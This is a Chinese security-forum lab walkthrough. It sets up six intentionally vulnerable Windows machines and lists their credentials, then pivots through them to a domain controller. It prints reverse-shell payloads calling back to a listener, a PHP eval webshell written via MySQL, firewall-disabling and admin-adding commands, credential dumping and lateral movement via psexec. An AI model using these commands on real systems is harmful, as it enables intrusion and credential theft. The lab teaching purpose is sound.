用户
搜索
  • TA的每日心情
    开心
    2018-8-21 19:28
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    3

    主题

    16

    帖子

    170

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-4-18

    i春秋签约作者

    发表于 2019-2-4 12:41:27 918353
    本帖最后由 WaIdo 于 2019-2-7 23:25 编辑

    0x01 实验拓扑图及实验用IP

    A组IP(实验用IP)

    1号

    账号:Administrator
    密码:Jack@!@#

    ip:192.168.141.111

    2号

    账号:ADMIN-PC/ADMIN
    密码:123456hhhh.

    222.18.158.244:7771

    ip:192.168.141.138

    3号

    域名:hiro.com

    管理员
    账号:hiro\administrator
    密码:hb123456,./$

    域用户
    账号:hiro.com/user1
    密码:hb123456,./$

    ip:192.168.141.100

    Tips

    里面设了静态ip 要改一下
    已将加入过程总结

    4号

    账号:administrator
    密码:Win@2003

    ip:192.168.141.114

    5号

    账号:Administrator
    密码:Win@2008

    ip:192.168.141.115

    6号

    账号:Administrator
    密码:Edvison233!

    ip:192.168.141.116


    0x02 环境搭建步骤

    本模块中的IP只是作为范例,与正式实验中所用IP不同

    一号机
    系统:Windows 10
    IP : 192.168.199.101
    对三号机192.168.199.103开放445端口

    配置步骤:

    1. 在虚拟机上安装win10系统
    2. 在网络共享中心配置静态IP

    image

    1. 对3号机开放445端口:
      新建入站规则(选择自定义)
      image

    应用于所有程序:
    image

    设置端口:
    image

    指定只对3号机开放:
    image


    二号机
    系统:Windows 7
    IP : 192.168.199.102

    配置步骤:
    安装Windows7,设置固定IP

    image


    三号机
    系统:Windows 2012
    IP : 192.168.199.103
    对192.168.199.104开放445端口

    配置步骤:
    Windows server 2012 搭建域环境

    计算机名:WIN-MT3C3TD4RQD.1.org
    所在域名或工作组名称:1.org
    IP地址:192.168.199.103
    操作系统:Windows Server 2012 R2
    密码   hb,./123456

    安装步骤
    1)    指定AD角色服务器的IP地址(这里的IP地址根据企业实际情况分配,但一定要是固定IP)

    image

    2)    点击Server2012左下角的“服务器管理器”显示如下界面

    image

    3)    点击“添加角色和功能按钮”弹出如下界面

    image

    4)    点击“下一步”
    image

    5)    这里选择”基于角色或基于功能的安装”,然后点”下一步”
    image

    6)    服务器选择这里选择默认的,假如你需要针对其它主机安装AD角色,这里可以选择你需要的主机,点击”下一步”
    image

    7)    这里勾选“Active Directory域服务”,当勾选这个选项时,会弹出如下对话框,点“添加功能”就OK
    image

    8)    这样就正确选择了安装AD角色,点击”下一步”
    image

    9)    功能页面不需要做任何选择直接点“下一步”
    image

    10) 这里是介绍AD角色的功能及注意事项,点击“下一步”
    image

    11) 勾选”如果需要,自动重新启动目标服务器”,然后点击”安装”
    image

    12) 安装成功后我们点击“关闭”,但这还没有完全安装成功
    image

    13) 点击服务器右上角的“功能按钮”
    image

    14) 弹出继续配置AD的对话框
    image

    15) 点击”部署后配置”,在红框处填入相应的域名
    image

    16) 点击“下一步”,红色方框选择域功能级别,绿色方框选择相应的功能,DNS/GC/RODC,黄色方框输入目录服务还原密码 密码是 hb,./123456
    image

    17) 点击“下一步”后配置DNS,由于不需要委派DNS,所以这里不需要设置,直接点击”下一步”
    image

    18) 这一步配置Netbios名,若没有特殊需求默认的就可以,直接点”下一步”

    19) 配置日志,数据库,sysvol路径,若没有特殊需求,默认就可以
    image

    20) 查看配置信息,若没有任何问题直接点”下一步”

    21) 这个页面是检测是否满足条件,满足条件后就可以直接点”安装”
    image

    22) 等待机器安装配置项,可能需要重启
    image

    23) 重启后我们会看到AD角色已经安装完成
    image

    验证安装

    1. 直接打开CMD命令行,输入”Net query fsmo”,这时会显示五种角色都已经安装成功
      image

    2. 若要进一步验证AD是否安装正确,可以使用DCDIAG /a命令行
      image

    设置端口开放:
    打开电脑找到控制面板,点击控制面板进入控制面板页面,点击系统和安全选项
    进入系统安全页面,点击防火墙选项
    进入windows防火墙面板,点击高级设置选项
    进入高级设置选项,点击右键新建规则
    进入规则想到页面,选择端口,点击下一步
    进入设置端口页面,设置需要开放的445端口,点击下一步
    选择允许链接,点击下一步
    配置文件项,点击下一步
    输入名称和描述,点击完成


    四号机
    系统:Windows 2003
    本机密码为空
    IP : 192.168.199.104
    对192.168.199.105开放445端口
    留Ms17010漏洞

    配置步骤:
    静态ip配置
    image

    设置本机管理员密码为空
    image

    防火墙配置
    image
    image

    攻击实例
    攻击机: kail     ip:192.168.246.128 (在本机验证时没有使用192.168.199.1xx的IP地址)
    靶机: win 2003   ip:192.168.246.141

    配置靶机只对攻击机开放445端口:
    先启用防火墙:
    image

    然后编辑445端口
    image
    image

    点击更改范围,再将攻击机的ip添加上去,这样就配好了。
    image

    配置ms17_010漏洞
    因为win server 2003 在未打补丁时都有ms17_010漏洞,所以我直接展示利用过程。
    利用msf进行攻击
    image

    获得shell
    image


    五号机
    系统:Windows server 2008
    IP : 192.168.199.105
    对192.168.199.106开放80端口
    安装PHP study ,MySQL弱口令

    1、首先完成本机phpstudy及MySQL的安装
    image
    image

    2、配置本机的静态IP为192.168.199.105
    image

    3、配置防火墙对六号机开放80端口
    在命令行中使用wf.msc打开防火墙高级设置
    image
    image

    在入站规则里添加新的规则,设置端口80
    image

    在新添加的规则右键属性
    在作用域里添加本地IP地址为192.168.199.106,即六号机的IP
    image
    image


    六号机
    系统:Windows server 2008
    IP : 192.168.199.106
    对192.168.199.102开放1433端口
    Sa账号为弱口令

    本机是六号机
    操作系统是 windows server 2008
    Ip是 192.168.199.106
    要求是配置一个sqlserver sa为弱口令的机器
    对2号开放1433端口

    首先,配置sqlserver
    下载SQL Server安装程序
    双击运行下载的SQL Server安装程序SQLEXPRWT_x64_CHS.exe。
    打开SQLServer安装中心,在右边选择“全新安装或向现有安装添加功能”。
    image

    SQL Server开始安装准备。一直下一步。
    在“数据库引擎配置”中,选择“混合模式”,并为“SQLServer系统管理员账户(sa)”指定密码,这里设置为弱口令
    image

    一直下一步 直到安装成功。

    然后设置对二号机开放1433端口
    第1步选择“打开或者关闭windows防火墙”把防火墙打开,然后选择“高级设置”,选择“创建规则”来指定端口。
    image

    现在“创建规则”,选择“端口”下--“TCP”和“特定本地端口”然后填写“1433”--下一步--下一步--为这个端口添加一个名称“1433”,然后确定就可以了。/3、在“入站规则”里选择刚才创建的规则,名称是“1433”,然后按照下图顺序就可以了。
    image
    image

    配置成功

    image


    以下为内网渗透测试过程

    0x03 使用kali拿下二号机

    通过MobaXterm连接Kali Linux(ip:192.168.141.143),用户名:root,密码:toor

    使用下述命令,执行,生成木马文件:

    msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe

    生成了test.exe之后,然后在kali里,设定端口监听,等待目标上线

    msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"
    

    在2号机上右击,以管理员权限执行。kali就可以接收到反弹回来的shell。对shell进行操作。

    在kali里接收到了shell,可在meterpreter中管理shell,开启3389

    在kali里接收到了shell,可在meterpreter中管理shell,开启3389

    run post/windows/manage/enable_rdp

    添加用户

    run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

    然后在服务器主机中,用新添加的账号,远程桌面连接2号机,至此完成了对2号机的控制

    2号机到6号机

    使用nmap扫描发现192.168.141.116开了1433端口

    nmap -p1433 --open 192.168.141.0/24

    使用ms-sql-brute模块对6号机sa账户进行爆破,获得用户名为sa,密码为123456

    nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116

    使用sqltools获取6号机数据库

    用xp_cmdshell关闭防火墙限制

    netsh firewall set opmode mode=disable

    添加3389入站规则

    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

    创建管理员用户Waldo6TEST

    net user Waldo6TEST 1234567hhhh. /add
    net localgroup administrators Waldo6TEST /add


    使用用户名Wado6TEST 密码1234567hhhh.成功登陆六号机

    6号机到5号机

    发现5号机开放80端口

    输入://192.168.141.115/phpmyadmin/,弱口令 用户名root 密码root

    尝试写入webshell

    use mysql;
    CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );
    INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');
    SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';

    Shell写到了:http://192.168.141.115/shell.php

    使用菜刀连接

    执行命令whoami,发现是administrator权限

    image

    加管理员用户

    net user Waldo 1234567hhhh. /add
    net localgroup administrators Waldo /add

    打开5号机3389端口:

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    连接到远程桌面

    5号机到4号机

    在5号机上传ms17010攻击脚本,用kali攻击机生成一个payload

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe

    开启msf监听

    msfconsole -q
    use exploit/multi/handler
    set lhost 0.0.0.0
    set lport 6666
    exploit

    在5号机中cmd中C:\Users\Waldo\MS17-010-master

    在5号机上,运行ms170101攻击脚本(脚本要自己下载)

    python zzz_exploit.py 192.168.141.114


    在kali里接收到了shell,可在meterpreter中管理shell,开启3389

    run post/windows/manage/enable_rdp

    添加用户

    run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

    在5号机远程登录4号机

    4号机到3号机

    在4号机中抓取hash

    privilege::debug
    sekurlsa::logonpasswords

    抓到域控管理员账号和密码:

    在4号机上,使用以下命令建立IPC$连接

    net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"

    在4号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘

    net use z: \\192.168.141.100\c$

    使用copy命令将先前生成的shell.exe拷贝至靶机C盘

    copy shell.exe \\192.168.141.100\c$

    在kali上开启监听(6666端口),使用psesec.exe.启动靶机上的shell.exe

    p**ec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe

    成功反弹shell上线:

    在kali里接收到了shell,可在meterpreter中管理shell,开启3389

    run post/windows/manage/enable_rdp

    添加用户

    run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

    在4号机远程登录3号机
    用户名:hiro\Administrator 密码:hb123456,./$

    3号机到1号机

    在3号机上,使用以下命令建立IPC$连接

    net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"

    在3号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘

    net use z: \\192.168.141.111\c$

    使用copy命令将先前生成的shell.exe拷贝至靶机C盘

    copy shell.exe \\192.168.141.111\c$

    在kali上开启监听(6666端口),使用p**ec.exe.启动靶机上的shell.exe

    p**ec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./$ c:\\shell.exe

    成功获取shell

    打开一号机3389

    使用用户名:hiro\Administrator 密码: hb123456,./$登录

    成功拿下一号机,实验成功!

    评分

    参与人数 1积分 +5 魔法币 +20 收起 理由
    Sir 7 + 5 + 20 感谢发布原创作品,i春秋论坛因你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    • · 1|主题: 6, 订阅: 0
    发表于 2019-2-4 19:27:04
    精彩文章就该赞一个,收藏一波
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    一个经典的内网渗透思路 学习到了 感谢
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2019-2-21 14:12:42

    感谢分享
    使用道具 举报 回复
    发表于 2019-2-24 23:21:27
    感谢分享
    使用道具 举报 回复
    发表于 2019-2-26 14:17:33
    如果我上传一个webshell,一看管理员权限,好吧,全撸了,不过还是挺好的
    使用道具 举报 回复
    发表于 2019-3-1 19:45:00
    Mr张yz 发表于 2019-2-26 14:17
    如果我上传一个webshell,一看管理员权限,好吧,全撸了,不过还是挺好的

    是的~这个只是个实验~~
    使用道具 举报 回复
    发表于 2019-4-28 10:22:25
    感谢发表,很好的文章
    使用道具 举报 回复
    发表于 2019-5-8 11:52:25
    实实在在的干货  感谢分享
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册